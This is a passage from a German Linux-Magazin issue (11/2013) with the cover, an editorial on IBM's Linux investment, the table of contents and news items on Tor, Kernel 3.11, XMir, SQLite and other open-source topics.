Linux-Magazin Reifeprüfung fürs Web (Vorschau)

11/13
DIE ZEITSCHRIFT FÜR LINUX-PROFESSIONALS
Linux-Wissen:
Audio Video Bridging
Neues Netzwerkprotokoll für Tonstudios,
Veranstalter und das Heimkino S. 88
Open Nebula
Hook sei Dank: Eigene
Skripte einklinken in die
freie Virtualisierung S. 74
SDL-Lib 2.0
Eine Bibliothek für fünf
Betriebssysteme: Simple
Directmedia Layer S. 94
Reifeprüfung fürs Web
Vier Frameworks und CMS erhalten die
gleiche Programmieraufgabe gestellt
■ PHP-Kandidat: Contao CMS S. 22
■ Java-Kandidat: Magnolia CMS S. 28
■ Ruby-Framework: Rails mit Angular.js S. 34
■ Python-Framework: Django S. 39
■ Prüfungsauswertung S. 46
■ BSI-Studie untersucht CMS-
Sicherheit S. 48
■ Drei XML-Editoren im TEI-und Docbook-Test S. 52
■ Volatility auf Spurensuche im RAM von Linux-Rechnern S. 68
Die Storagesoftware Git-Annex synchronisiert Daten über Geräte, Server und Clouddienste hinweg S. 58
www.linux-magazin.de
Deutschland Österreich Schweiz Benelux Spanien Italien
4 6,40 4 7,05 sfr 12,80 4 7,50 4 8,30 4 8,30
4 192587 306401 11

1 000 000 000
Login 11/2013
Editorial
Mindestens für Linuxer bildet „Eine Milliarde US-Dollar“ die Zahl des Tages.
Zugleich ist das, zumindest für Leute, die weder Apple noch Microsoft mitgegründet
haben, unfassbar viel Geld. Würde beispielsweise ein Bauer diesen
Betrag in 100-Dollar-Noten abheben, könnte er ziemlich genau zehn Hektar
Acker damit nahtlos auslegen. Als antikapitalistische Kunstinstallation wäre
das sicher hübsch anzusehen, aber schon der erste Herbstwind würde den
fragilen Charakter der Sache deutlich machen.
www.linux-magazin.de
3
Der Bauer könnte das Geld aber auch ausgeben. Dass dem Leitartikel-Schreiber
dabei 100 Millionen Delug-Ausgaben vom Linux-Magazin einfallen, sei ihm
bitte verziehen. Alternativ käme Linus Torvalds einige wenige Tausend Jahre
über die Runden, was dem Linux-Kernel im gleichen Maße zuträglich wäre wie
der Laune mancher Kernel-Mailinglisten-Diskutanten abträglich.
Jan Kleinert, Chefredakteur
Oder aber, man gibt den Betrag nicht sofort aus und benutzt die Zahl nur für
Vergleiche. Rund eine Milliarde Dollar ist der Jahresumsatz von Red Hat oder ein Hundertstel des Umsatzes
von IBM. Umgerechnet eine Milliarde Dollar nimmt der deutsche Fiskus jährlich durch die Biersteuer ein, was
im zeitlichen und örtlichen Umfeld des Münchner Oktoberfestes einigermaßen Sinn ergibt.
Um ganz nüchtern auf den Grund der Greenback-Akrobatik hier zu kommen: IBM kündigte gerade auf der
Linuxcon 2013 in New Orleans an, eine Milliarde US-Dollar für neue Linux- und Open-Source-Technologien
für Power-Systems-Server auszugeben. Konkret will der Konzern ein neues Kundenzentrum im französischen
Montpellier investieren und eine Linux-Power-Entwicklungsumgebung in der Cloud entwickeln, um
der „schnell wachsenden Entwicklergemeinde mit mehreren Tausend ISVs und Open-Source-Projekten
Rechnung zu tragen“.
Das neue Kundenzentrum und auch die geplante Entwicklungsumgebung sollen es Software-Entwicklern
erleichtern, offene Linux-Anwendungen für Big Data, Cloud, Mobile und Social Business auf Power-7-Prozessoren
zu schreiben und bereitzustellen. Die Gelder fließen sowohl in Forschung, Design und Entwicklung
als auch für Schulungen, Veranstaltungen und in Markteinführungs- und Förderprogramme für Kunden,
Geschäfts- und Hochschulpartner.
Seltsamerweise erzeugte IBMs Ankündigung nur wenig Echo in den Medien – vielleicht, weil es schon das
zweite seiner Art ist. Ende 2000 hatte der Konzern begonnen, die gleiche Summe für Linux-nahe Entwicklungen
zu investieren, und gründete zu diesem Zweck sogar eine interne Kompanie. IBM-Entwickler steuern
seither Code für diverse Open-Source-Projekte bei, besonders am Herzen liegen der Firma Open Power, Open
Stack, Hadoop, Open Daylight, KVM, Apache und Eclipse.
Das explizite Pushen der Power-7-Plattform jetzt ist sicher eine streng strategische Entscheidung, um diese
Maschinen softwaretechnisch attraktiver zu machen. Ob eine Milliarde US-Dollar dafür angemessen sind,
ist schwer zu sagen. Um es mal wieder zu vergleichen: Der »arch/powerpc«-Quellcode-Zweig des aktuellen
Kernels 3.11.1 ist mit Mann und Maus rund 11,5 MByte groß. Wenn Big Blue nur ihn bedächte, stünden künftig
für die Weiterentwicklung jedes Quellcode-Bits zehn Dollar bereit. Dafür lässt sich mancherorts ein Bit-Bier
bestellen, was wiederum den Fiskus freut.

Inhalt
www.linux-magazin.de 11/2013 11/2013
4
Die Reifeprüfung fürs Web: Das Linux-Magazin lässt vier freie Content Management Systeme
und Webframeworks antreten. Programmierprofis der Projekte zeigen, wie sie einen Veranstaltungskalender
auf Grundlage externer Daten umsetzen. Das Herangehen und der Aufwand
fallen sehr unterschiedlich aus, ein Projekt hielt die Aufgabe anfangs für nicht lösbar.
Aktuell
Titelthema: Erweiterungsfähigkeiten von Frameworks und CMS
6 N ew s
n Tor kämpft mit Botnet-Ansturm
n Wetterstation für Raspberry Pi
n Linus: Kein NSA-Code im Kernel!
21 Einführung
Titel
Statt langer Feature-Listen: ein praktisches
Beispiel.
22 Contao
Nur für den Experten einfach: Contao-
Module schnell und sicher entwickeln.
39 Django
Zwar ist die Aufgabe für das das Python-
CMS-Framework Django nicht wirklich
maß geschneidert, aber machbar.
Das Web-basierte ERP-System Open Z kann
jetzt mit MES-Funktionen aufwarten.
28 Magnolia
Das Java-CMS bringt Entwickler rasch
ans Ziel.
Die vom Autor genutzte IDE heißt Pycharm, im
Bild zu sehen ist die Datei »views.py«.
12 Zahlen & Trends
n Libre Office 4.2 verbessert OOXML
n Neuseeland schafft Softwarepatente ab
46 Wertung
Viele Wege führen zur fertigen Website,
doch mit unterschiedlichem Aufwand.
Ein blühender Magnolia-Baum im Eigenbau.
34 Ruby on Rails
Das Framework im Verbund mit Angular.js.
48 Das Interview
Eine BSI-Studie zur CMS-Sicherheit vergleicht
Open-Source-Systeme..
VMware-CEO Pat Gelsinger feiert sich und
seine Firma und glaubt an eine rosige Zukunft.
18 Zacks Kernel-News
n Wann ist ein Patch reif für den Kernel?
n Mehr Ordnung im Device Tree
20 Wikimedia OER Berlin
Die Konferenz um freies Wissen.
Erstmals trafen sich deutsche OER-Akteure.
Karma prüft Javascript in mehreren Browsern.
DELUG-DVD
Privacy Remix
TOOL
Bootet von DVD: Paranoides
Ubuntu-12.04-Derivat für die Zeit
nach Ed Snowden
Virtual Appliance
TOOL
TOOL
TOOL
Fertiges Django-Framework mit
objekt relationalen Mapper für
MySQL, Oracle, PostgreSQL, SQlite
TOOL
Christian Breitenstrom, Autor der CMS-Studie.
Details zu DVD-
TOOL
Inhalten auf S. 51
E-Book komplett
Christian Ullenboom:
„Java 7 – Mehr als eine Insel“
Debconf 2013
Videos: Prominente Debian-Freunde
beim Entwicklertreffen
Software-Suite
Passend zu den Artikeln im Heft

11/2013 11/2013
Inhalt
64 Erlösende Einsamkeit
Manche kritischen Daten sollten Admins
nur auf Inselsystemen ohne Netzwerk
vorhalten. Für solche Hochsicherheitszonen
taugt das Ubuntu Privacy Remix.
74 Action am Haken
Shellprogramme per Mausklick in die
Cloud-Verwaltung integrieren? Kein
Problem, wenn Open-Nebula-Hooks
zum Einsatz kommen.
84 Auferstanden
Kompatibel zur ICANN, aber vollständig
unabhängig und nur der Community
unterstellt will die eigentlich schon
beerdigte DNS-Alternative sein.
www.linux-magazin.de
5
Software
Sysadmin
Know-how
51
Einführung
Auf der DELUG-DVD: Totale Privatspäre
mit dem Ubuntu Privacy Remix, Debconf-
Videos und ein Java-E-Book.
52 Bitparade
Titel
Strukturiertes Arbeiten: Drei XML-
Editoren treten gegeneinander an.
67 Einführung
Aus dem Alltag eines Sysadmin: Charly
und sein Indianer, dazu Salat oder Steak
und der Varnish-Proxy als Lösung.
68 Volatility 2.3
Titel
Der Memory-Dump-Analyzer Volatility
inspiziert jetzt auch Linux-Systeme.
84 Open Root Server Network
Auch ohne die USA: Das ORSN will ein
Gegengewicht zur ICANN schaffen.
88 Linux-AVB
Titel
Als Multimedia-Brücke überträgt Audio
Video Bridging Multimediadaten in
Echtzeit an andere Rechner.
58 Git-Annex
Titel
Programmiert in Haskell, nutzt Git-Annex
Tools wie Inotify und ein Webinterface,
um verteilte Dateien zu synchronisieren.
Das Volatility-Tool Yarascan hat eine gespawnte
Shell gefunden, in der Netcat läuft.
74 Open-Nebula-Skripting
Titel
Virtuelle Maschinen am rechten Haken:
Open Nebula mit Hooks erweitern.
Wireshark findet im Netzwerkverkehr die
Nachrichten des AVB-Protokolls MRP.
92 Insecurity Bulletin
Fehlerhaft generierte Zufallszahlen in
Android sorgen für Unsicherheit.
Der Assistant merkt, wenn neue Dateien da
sind und startet die Synchronisation.
60 Tooltipps
Im Kurztest: Macchanger 1.6.0, Codesh
2.0.1, Enc 0.2, Arp Scan 1.9, Cyberprobe
0.20 und, Palaver (August 2013).
Forum
78 OSS in Europa
Europas Behörden vertrauen auf Open
Source. Deutschland scheint abgehängt.
Programmieren
94 SDL 2.0
Titel
Für gleich fünf Systeme passend präsentiert
sich das Simple Directmedia Layer.
64 Ubuntu Privacy Remix
Ein radikales OS für Sicherheitsbewusste.
Service
3 Editorial
106 IT-Profimarkt
108 Stellen
112 Veranstaltungen
112 Inserenten
113 Impressum
114 Vorschau
Jedes Jahr 10 000 Rechner migriert die französischen
Gendarmerie zu Gendubuntu.
82 Bücher
Bücher über Shellprogrammierung
sowie über C++.
Auf SDL basieren fast alle über Steam angebotenen
Spiele, auch Blockbuster wie Portal.
100 Perl-Snapshot
Nicht nur für die Katz: Maschinell mit
Perl-Skripten erzeugte Memes.

Aktuell
www.linux-magazin.de News 11/2013
6
News
Tor kämpft mit Botnet-Ansturm
Um den 20. August herum verzeichnete
das Tor-Netzwerk eine
außergewöhnliche Zunahme
an neuen Nutzern, ihre
Zahl stieg von 500 000 auf 3,5
Millionen (Stand: 12.9.2013).
Doch nicht die internationalen
Geheimdienste treiben
Tor neue User zu, vielmehr
scheint ein riesiges Botnetz
Schuld zu sein, das legt Roger
Dingledine in einem Blogbeitrag
[https://​blog.​torproject.​org/​
​blog/] nahe.
Er könne nur über die Ursachen
spekulieren, da das
Tor-Projekt keine Logs behalte.
Neue Aktivisten oder den
Tor-Browser von The Pirate
Bay schließe er als Quelle für
die Invasion aber aus. Er gehe
von einem Botnetz aus, das
seinen Kontrollserver als Hidden
Service betreibe.
Es sei auffällig, dass der von
den neuen Usern generierte
Traffic keine externen Webseiten
betreffe. Während Relays
einen starken Anstieg von
»ESTABLISH_RENDEZVOUS«-
Request verzeichnen, würden
die Exit-Nodes keine signifikanten
Zusatz-Traffic zeigen.
Dingledine ist zufrieden, dass
das Tor-Netzwerk auch unter
Druck noch funktioniere, Probleme
würden aber die vielen
vom Botnetz aufgebauten
Routen (Circuits) bereiten.
Um sie zu etablieren, nehmen
die Relay-Server umfangreiche
Public-Key-Operationen
vor, was die CPU-Load auf die
Spitze treibe.
Das vermeintliche Botnet
nutzt die stabilen Tor-Clients
in der Version 0.2.3.x. Dingledine
empfiehlt neuen Nutzern
den Umstieg auf Version
0.2.4, die beim Aufbau der
Circuits den smarten N-Tor-
Handshake verwendet anstelle
des älteren Tap. Die neueste
Entwicklerversion 0.2.4.17-rc
priorisiere N-Tor sogar, weshalb
sich ihre Nutzer in der
Warteschlange vordrängeln
dürfen, Pakete dieser Version
gibt es bereits.
Mittlerweile ist die Zahl der Tor-Clients bei 3,5 Millionen angekommen.
Wechselt auch das Botnet zu
den neuen Clients, wäre das
Tor-Netzwerk dennoch besser
dran, weil es besser skaliere.
Den Botnet-Entwicklern
empfahl er, für ihre Millionen
von Clients nicht die 4000
Tor-Knoten, sondern lieber
ein eigenes P2P-Anonymisierungssystem
zu verwenden.
Bösartig scheine das Botnet
aber bisher nicht zu sein, gibt
er zu. Wollte es das Netzwerk
„ruinieren“, würde es mit
den Bots einfach viel Traffic
erzeugen.
Langfristig müsse man aber
nach weiteren Lösungen für
solche Situationen suchen.
Wenn nötig werde man auch
alle 0.2.3-Clients aus dem
Netzwerk verbannen. Dingledine
rief zugleich Security-
Forscher dazu auf, die Eigenschaften
des Botnetzes zu
ergründen, um es nach Möglichkeit
abzuschalten.
Die Security-Firma Fox IT geht
davon aus, dass das Botnet
erst in jüngster Zeit unter dem
Namen „Mevade.A“ auftrete,
aber bereits seit 2009 existiere
und früher „Sefnit“ hieß.
Es habe seinen Kontrollserver
erst kürzlich in das Tor-Netzwerk
verlegt, was mit dem
Anstieg von Clients korreliere.
Laut Fox IT stamme es aus
einer russischsprachigen Region
und sei profitorientiert.
Tor-Projektmitarbeiter haben
diese Annahme bisher nicht
offiziell bestätigt.
n
Typo-3-Camp Regensburg im Oktober
Vom 25. bis 27. Oktober 2013
findet das zweite Typo-3-
Camp Regensburg [http://​www.​
​typo3camp‐regensburg.​de] statt.
Unter dem Motto „Inspiring
People to Share“ trifft sich
die deutschsprachige Typo-3-
Community zum Informationsaustausch.
Die Veranstaltung findet als
Barcamp statt, bei dem die
Teilnehmer mit Hilfe der Website
selbstständig Sitzungen
zu den gewünschten Themen
organisieren. Die Typo 3 Usergroup
Regensburg e.V. und ihre
Mitveranstalter rechnen mit
mehr als 100 Teilnehmern.
Ein reguläres Ticket für das
Camp kostet 49 Euro, ein Unterstützerticket
79 Euro. In
beiden Fällen kommt noch eine
Vorverkaufsgebühr für den
Ticketdienst hinzu. n

SQlite 3.8.0 optimiert Performance
SQlite 3.8.0 [https://​sqlite.​org]
ist erschienen und bringt einige
Neuerungen mit, die die
Arbeit mit der Datenbank optimieren.
So erlauben es partielle
Indexe, nur bestimmte
Teile einer Tabelle zu indexieren,
und beschleunigen so in
großen Tabellen den Zugriff
auf bestimmte Daten. Dabei
wird an das Statement »CREA-
TE INDEX« ein »WHERE«-Teil
gehängt, der die zu indizierende
Untergruppe bestimmt.
Der Next Generation Query
Planner (NGQP) soll besonders
beim Zugriff auf große
Datenmengen aus vielen Möglichkeiten
den effektivsten
Algorithmus ermitteln. Das
erweist sich bisweilen als Wissenschaft
für sich [https://​sqlite.​
​org/​queryplanner‐ng.​html].
Der neue Planner soll besser
und schneller arbeiten und
zum Beispiel das Problem des
8-Wege-Join von TPC-H Q8
deutlich eleganter lösen als
bisher, nämlich über die N3-
Heuristic (N Nearest Neighbors).
Bei TPC-H handelt es
sich um den Benchmark des
Transaction Processing Performance
Council, eines Non-
Profit-Konsortiums.
Spezielle Tabellen mit integrierter
Volltextindexierung
erlauben es, Text wesentlich
schneller zu durchforsten, als
wenn der Datenbanker ihn
wie bisher einfach in klassischen
Tabellen ablegt.
Das virtuelle Tabellenmodul
FTS 4 (für Full-text Search)
erlaubt es nun, für Tabellen
bestimmte Spalten zu definieren,
welche die Volltextsuche
nicht indexieren soll, was
den Prozess beschleunigt.
Der Quelltext findet sich im
Downloadbereich [https://​
​sqlite.​org/​download.​html]. n
News 11/2013
Aktuell
www.linux-magazin.de
7
Air Pi: Wetterstation für den Raspberry Pi
Für umgerechnet rund 79 Euro
inklusive Versandkosten verkaufen
britische Schüler einen
Bausatz, der sich in eine Wetterstation
für den Raspberry Pi
verwandeln lässt. In dem Air
Pi [http://​airpi.​es] genannten
Projekt haben Alyssa Dayan
und Tom Hartley, zwei Schüler
der Westminster School in
London, eine eigene Wetterstation
für den Raspberry Pi
entwickelt. Damit nahmen sie
an einem Erfinderwettbewerb
namens „PA Consulting Raspberry
Pi Competition“ teil und
gewannen.
Der Bausatz für die Wetterstation
lässt sich nun online bestellen
und nach Deutschland
liefern, wo man ihn dann mit
Hilfe einer Anleitung zusammenlöten
kann. Ein Raspberry
Pi ist im Preis nicht enthalten,
es handelt sich um eine separate
Zusatzplatine.
Quelle: http://airpi.es
Beim Air Pi handelt es sich um den Bausatz für eine Wetterstation, die sich als
Zusatzmodul an einen Raspberry Pi hängen lässt.
Der Air Pi zeichnet Wetterdaten
auf und streamt sie ins
Internet. Zu den gesammelten
Daten gehören neben der Temperatur
die Luftfeuchtigkeit,
der Luftdruck, der UV-, Kohlenstoffmonoxid-,
Stickstoffdioxid-
und Helligkeits-Level.
Der Air Pi lässt sich nicht nur
als Wetterstation verwenden,
sondern auch im Haus einsetzen,
um die Feuchtigkeit zu
messen oder nachzuschauen,
ob die Kids das Licht ausgeschaltet
haben.
Der zugehörige Code und
die Schaltpläne stehen schon
auf Github [http://​github.​com/​
​tomhartley/​AirPi] bereit. Lediglich
ein GPS-Modul fehlt,
weil das Kit sonst zu teuer
geworden wäre. Ab Oktober
will man die Bausätze ausliefern,
die über Tindie, eine
Plattform für Hardwarebastler,
vertrieben werden. n
Neues Open-Suse-Image für Raspberry Pi
Der Suse-Entwickler Bernhard
Wiedemann hat ein neues Linux-Image
für den Minicomputer
Raspberry Pi auf Basis
von Open Suse veröffentlicht.
Das komprimierte Image für
Armv6, das als XZ-Archiv vorliegt,
ist nur rund 82 MByte
groß. Dennoch enthält es unter
»/home/abuild/rpmbuild/
SOURCES/« die Shellskripte,
mit denen der Anwender ein
eigenes, maßgeschneidertes
Image bauen kann. Diese
Skripte sind außerdem gesondert
erhältlich.
Das ARM-Image bringt nun
auch den recht aktuellen
Kernel 3.6 sowie den Windowmanager
Icewm mit. Es
lässt sich auch recht einfach
in der Größe anpassen. Ein
neues Image lässt sich laut
Wiedemann in etwa 3 Minuten
erzeugen. Zudem stehen
auf dem Open Build Service
rund 5200 Softwarepakete für
ARM zur Installation bereit.
Blogeinträge von Bernhard
Wiedemann und Jos Poortvliet
enthalten Hinweise zum Bauen
eines eigenen Image. n

Aktuell
www.linux-magazin.de News 11/2013
8
Ubuntu-Edge-Kampagne verfehlt Ziel
Mit den zugesagten 12,8 Millionen
US-Dollar erreichte die
Crowdfunding-Kampagne für
das Ubuntu Edge nur ein gutes
Drittel der anvisierten Gesamtsumme
von 32 Millionen
US-Dollar. Doch stellte Canonical
zumindest zwei Rekorde
für Crowdfunding-Plattformen
auf: Neben der höchsten jemals
angestrebten Summe
setzte auch der zugesagte Betrag
eine Rekordmarke.
Dennoch: Findet sich kein
Hardwarehersteller, der das
Edge auf eigenes Risiko finanziert,
ist das Projekt wohl gestorben.
Canonical setzt nun
voll auf das Ubuntu Phone,
hat dafür aber noch keinen
Hersteller angekündigt. Fortgeschrittene
Nutzer können
Ubuntu Touch, das Betriebssystem
für Smartphones, jedoch
selbst auf vielen aktuellen
Geräten installieren. n
Rekordverdächtig, aber Ziel verfehlt: Die Crowdfunding-Kampagne für das
Ubuntu Edge auf Indiegogo erreichte nicht die anvisierten 32 Millionen Dollar.
NSA-Code im Kernel? Linus sagt: Nope!
Auch Linus Torvalds spürt
mittlerweile die Auswirkungen
der NSA-Affäre. Weil
die Dokumente von Edward
Snowden nahelegen, dass die
NSA gezielt Bugs in Verschlüsselungs-Software
und ‐Hardware
einbaute, sehen einige
User und Kryptographie-Experten
nun etwas kritischer
auf Algorithmen zur Erzeugung
von Zufall (RNG, Random
Number Generators), etwa
auf der Cryptography-Mailingliste.
So auch Kyle Condon
aus Großbritannien, der bei
Change.org eine Petition einreichte,
um die Unterstützung
von Rdrand aus dem Kernel
entfernen zu lassen.
Bei Rdrand handelt es sich
um eine Instruktion für Ivy-
Bridge-Prozessoren, die einen
Hardware-generierten
Zufallswert zurückliefert. Der
Zufallsgenerator ist laut Intel
konform mit den Standards
NIST SP800-90, FIPS 140-2
und ANSI X9.82. Der Vorwurf
lautet, dass Intel absichtlich
oder unabsichtlich die NSA
mit ins Boot geholt habe, weil
NIST SP800-90 vermutlich eine
Backdoor enthalte.
Dual_EC_DRBG, einer der
vier Algorithmen, die NIST
SP800-90 beschreibt, basiert
demnach auf Elliptic Curve
Cryptography und sei dreimal
langsamer als die anderen
Ansätze. 2007 hatte Kryptoexperte
Bruce Schneier bei
der Crypto-Konferenz auf die
Arbeit von Dan Shumow und
Niels Ferguson hingewiesen,
die zeigten, dass der Algorithmus
Schwächen aufweise, die
sie durchaus als Backdoors
bezeichnen würden.
Linus antwortete indes gewohnt
charmant auf die Vorwürfe:
„Wo starte ich eine
Petition, um den IQ und das
Kernel-Wissen der Leute zu
steigern?“ Rdrand sei eben
nur eine Quelle im Kernel für
die Zufallserzeugung. Selbst
wenn die Nummern nicht
ganz zufällig seien, weil die
NSA mitwirke, führe die Einbindung
von Rdrand zu einer
höheren Entropie. „Leute,
schaut euch »drivers/char/
random.c« an. Lernt mehr
über Kryptographie. Schließlich:
Kommt hierher zurück
und gebt vor aller Welt zu,
dass ihr Unrecht hattet.“ n
XMir-Bug verrät Passwörter
Der Entwickler Matthew Garrett
warnt vor einer Sicherheitslücke
in XMir, einer
Komponente von Ubuntus
Dis playserver Mir. Den möchte
Canonical in der kommenden
Ubuntu-Version 13.10
als Standard-Displayserver
einsetzen. Damit die Mehrheit
der GUI-Anwendungen,
die als X-Clients programmiert
sind, noch funktioniert,
kommt XMir als Adapter zum
Zuge. Es verwendet X-Input-
Treiber, um Eingaben direkt
zu empfangen.
Das sorgt für den kritisierten
Bug: Schaltet der Anwender
auf eine virtuelle Konsole um,
etwa mit [Strg]+[Alt]+[F1],
um sich dort einzuloggen, und
kehrt wieder zum Mir-Display
zurück, werden in XMir Username
und Passwort sichtbar.
Eine so genannte Information
Disclosure, die vertrauliche
Daten an jene verrät, die das
Display sehen können.
Laut Matthew Garrett [http://​
​mjg59.​dreamwidth.​org/​27327.​html]
ist der Bug schon seit dem
20. Juni bekannt. Er kritisiert,
das Paket sei samt Fehler in
die Saucy-Repositories umgezogen.
Die Warnung stehe in
der zugehörigen Mitteilung
nur unter ferner liefen.
Ubuntu 13.10 befindet sich
noch im Entwicklungsstadium
und ist vom Hersteller nicht
für den Produktiveinsatz empfohlen.
Somit sind von diesem
Bug bislang nur Entwickler
und Tester betroffen. n

Debconf 13: Videos der Vorträge und Sitzungen online
Nach der Debian-Entwicklerkonferenz
[http://​debconf13.​
​debconf.​org] in der Schweiz stehen
die Vorträge nun online
als Videos zur Verfügung. Das
Videoteam der freien Linux-
Distribution bietet die Aufzeichnungen
in unterschiedlichen
Auflösungen als Dateien
zum Herunterladen an. Wer
sich die Vortragsvideos lieber
online ansehen möchte,
besucht die Seiten der französischen
Open-Source-Einrichtung
IRILL [http://​www.​irill.​
​org]. Dort lassen sie sich als
HTML-5-Videos in modernen
Browsern abspielen.
Unter anderem hält das Video-Archiv
Vorträge über die
Init-Systeme Systemd und Upstart
parat, die Keynote des
Debian-Projektleiters Lucas
Nussbaum sowie Referate
über den Kernel, das Compiler-Frontend
Clang und UEFI
Secure Boot. In den Birds-ofa-Feather-Sitzungen
trafen
sich Gleichgesinnte, um über
Ruby, Debian-Derivate, Ikiwiki
oder ARM zu diskutieren.
Weitere Highlights sind die
amüsante Debian-Kosmologie
von Joey Hess und der Maria-
DB-Vortrag des MySQL-Vaters
Michael Widenius. n
News 11/2013
Aktuell
www.linux-magazin.de
9
Open Z: Open-Source-ERP mit MES-Funktionen
Das Unternehmen Open Z
[http://​openz.​de] aus Worpswede
hat sein gleichnamiges
ERP-System in Version 2.6.76
veröffentlicht. Mit dieser Release,
schreibt der Hersteller,
biete die Open-Source-Software
umfassende Funktionen
eines Manufacturing Excecution
System (MES). Umgesetzt
seien Produktionssimulation,
Produktionslauf, Beschaffung,
Lagerführung und Ressourcenplanung.
Ein grafischer
Einsatzplan sorge für Übersicht,
eine dynamische Umplanung
sei möglich. Daneben
erlaubt Open Z das Einscannen
von Barcodes, QR-Codes
und RFID-Tags zur Betriebsdatenerfassung.
Das Web-basierte ERP-System
entstand als Fork von Open
Bravo und ist in Java 7 mit
Tomcat 7 und PostgreSQL 9.1
umgesetzt. Die verwendeten
Komponenten stehen unter
verschiedenen Open-Source-
Lizenzen.
Für interessierte Anwender
steht Open Z als virtuelle Appliance,
in Form von Debian-
Paketen sowie als Tarball zum
Download bereit.
n
Das Web-basierte ERP-System Open Z mit seinem Ressourcenplan.
Linus feiert 22. Linux-Geburtstag
Bei seiner Ankündigung der
Kernelversion 3.11-rc7 am
25. August 2013 erlaubte sich
Linus Torvalds einen Scherz,
der auf den 22. Geburtstag
des Linux-Kernels anspielte.
Die Nachricht zur bevorstehenden
Veröffentlichung las
sich seltsam vertraut:
„Hello everybody out there
using Linux – I’m doing a
(free) operating system (just a
hobby, even if it’s big and professional)
for 486+ AT clones
and just about anything else
out there under the sun. This
has been brewing since april
1991, and is still not ready. I’d
like any feedback on things
people like/​dislike in Linux
3.11-rc7.
I originally ported bash(1.08)
and gcc(1.40), but others have
taken over user space and
things still seem to work. This
implies that I’ll get the final
3.11 release within a week,
and I’d like to know what
features most people would
want. Any suggestions are
welcome, but I won’t promise
I’ll implement them :-)“
Natürlich, es handelt sich um
eine leichte Abwandlung der
bekannten E-Mail, die Linus
Torvalds am 25. August 1991
auf „comp.os.minix“ veröffentlichte,
also genau 22
Jahre zuvor. In ihr kündigte
er ein an Minix erinnerndes,
freies Betriebssystem für
386(486)-AT-Klone an. Die E-
Mail wird häufig als Geburtsstunde
von Linux betrachtet,
obwohl der Finne bereits etwas
früher mit der Arbeit am
Kernel begann. Die Mail zeigt:
Offenbar sieht auch Linus den
Termin als Geburtstag.
Einen Veröffentlichungstermin
am 12. August 2013 hatte
Linus mit Bedauern verpasst.
In diesem Fall wäre Linux 3.11
genau 20 Jahre nach dem Veröffentlichungstermin
von
Windows 3.11 („Windows for
Workgroups“) erschienen.
Dem Ereignis zu Ehren trägt
Linux 3.11 den Codenamen
„Linux for Workgroups“. n

Aktuell
www.linux-magazin.de News 11/2013
10
Kurznachrichten
Rygel 0.19.5: Ein Mediaserver mit UPnP-Fähigkeiten. Neu: Im Softwarekern
wurde die Farbtiefe für PNGs auf 24 Bit gesetzt. Das Mediaserver-Plugin
weiß seit Neuem, welche DLNA-Profile Rygel unterstützt, diese Information
besaß vorher nur die Media-Engine. Auch der Renderer akzeptiert
nun ein Set von DLNA-Profilen und versteht, anders als bisher, nicht
nur Mime-Types. Das Playbin-Plugin funktioniert mit der Simple Engine,
manuell entfernte Einträge fliegen aus der Item-Remove-Warteschlange.
Lizenz: LGPL [https://​wiki.​gnome.​org/​Rygel]
Upstart 1.10: Init-System, das Jobs und Events verwendet und unter
Ubuntu und Debian zum Einsatz kommt. Neu: In der neuen Version erzeugt
die Komponente Upstart-local-bridge lokale Sockets, auf welche die Jobs
von Upstart anspringen, sobald die Sockets ihnen Namen-Wert-Paare
zusenden. Session-Jobs reagieren hingegen auf Änderungen in der Dconf-
Datenbank. Die Komponente Upstart-dbus-bridge bringt mit »‐‐bus‐name«
einen neuen Schalter mit, der es erlaubt, Bus-Namen-Variablen in einen
Dbus-Event zu integrieren. Anstelle von »SIGHUP« lassen sich inzwischen
auch andere Signale festlegen, die Jobs an den Hauptprozess übergeben.
Lizenz: GPLv2 [https://​launchpad.​net/​upstart]
Calibre 1.0: Eine plattformübergreifende Software zur Ebook-Verwaltung.
Neu: Herausragende Merkmale der neuen Version 1.0 sind die überarbeitete
Präsentation der Buchcover, das beschleunigte Datenbank-Backend,
die Möglichkeit, Word-Dateien in Ebook-Formate zu konvertieren, sowie
die Option, aus Schnittmengen des eigenen Ebook-Bestands virtuellen Bibliotheken
zu erzeugen. Daneben gelingt das Herunterladen von Metadaten
einfacher, bettet Calibre 1.0 Fonts ein, bearbeitet die Inhaltsverzeichnisse
von Ebooks und bringt eine neue Output-Engine für PDF-Dateien mit.
Lizenz: GPLv3 [http://​calibre‐ebook.​com]
Couch DB 1.4.0: NoSQL-Datenbank unter dem Dach der Apache Foundation
Neu: Couch DB bringt das Modul »couch_dbupdates« mit, das Informationen
über Datenbank-Events sammelt. Über das HTTP-API lässt sich
dafür ein GET-Request absetzen. So holt »curl http://127.0.0.1:5984/_db_
updates?feed=continuous« einen kontinuierlichen Feed der Ereignisse.
Für die »_all_docs«-View gibt es nun »_list«-Funktionen, was den Massenexport
von Dokumenten an Tools erleichtert, die eine einfache Formatierung
benötigen. Plugins wie Geo-Couch, Browser-ID, Oauth lädt Couch DB
nun automatisch. Lizenz: Apache-2.0-Lizenz [http://​couchdb.​org]
Neues im Kernel 3.11: Grafik, ARM, Virtualisierung und temporäre Dateien
Auf der Kernel-Mailingliste
kündigte Linus Torvalds die
neue Linux-Version 3.11 an,
die anlässlich des 20. Windows-3.11-Geburtstags
den satirischen
Codenamen „Linux
for Workgroups“ trägt.
Zu den Top-Features im neuen
Kernel gehören Änderungen
im Grafikbereich. Über
den Bootparameter »radeon.
dpm=1« lässt sich das noch
experimentelle dynamische
Powermanagement für die
freien ATI-Treiber aktivieren,
was Strom spart und die Betriebstemperatur
senkt.
Der Nouveau-Treiber unterstützt
nun das Dekodieren von
H.264/​MPEG2-Videos mit Hilfe
des Videoprozessors VP2.
Support für die neuen Sea-Islands-GPUs
von ATI (Radeon
HD 8000) bringt der Kernel
ebenso mit wie einen DRM-
Treiber für R-Car, den ARM
Cortex-A9 Quadcore-SoC von
Renesas. Letzterer soll künftig
vor allem in Infotainment-Systemen
von Autos zum Einsatz
kommen. Für die ARM-64-Architektur
unterstützt Kernel
3.11 nun Virtualisierung mit
Xen und KVM. Die 32- und
64-Bit-Varianten von ARM
kommen dank des virtuellen
Dateisystems Hugetlb-FS mit
Huge Pages und transparenten
Huge Pages zurecht.
Auch temporäre Dateien sollen
sicherer werden. Das »O_
TMPFILE«-Flag erzeugt nichtpermanente
Files, die im
Dateisystem unsichtbar bleiben.
So sollen Dateien ohne
Race Conditions entstehen,
die gleich nach dem Schließen
verschwinden. Ein „Soft-dirty“
genannter Mechanismus erlaubt
es nun, vom Userspace
aus die Pages zu verfolgen,
auf die ein bestimmter Prozess
schreibt.
Der Kernel 3.11 unterstützt
neuerdings zudem LZ4-Kompression
und hat einen vorläufigen
Client-Support für
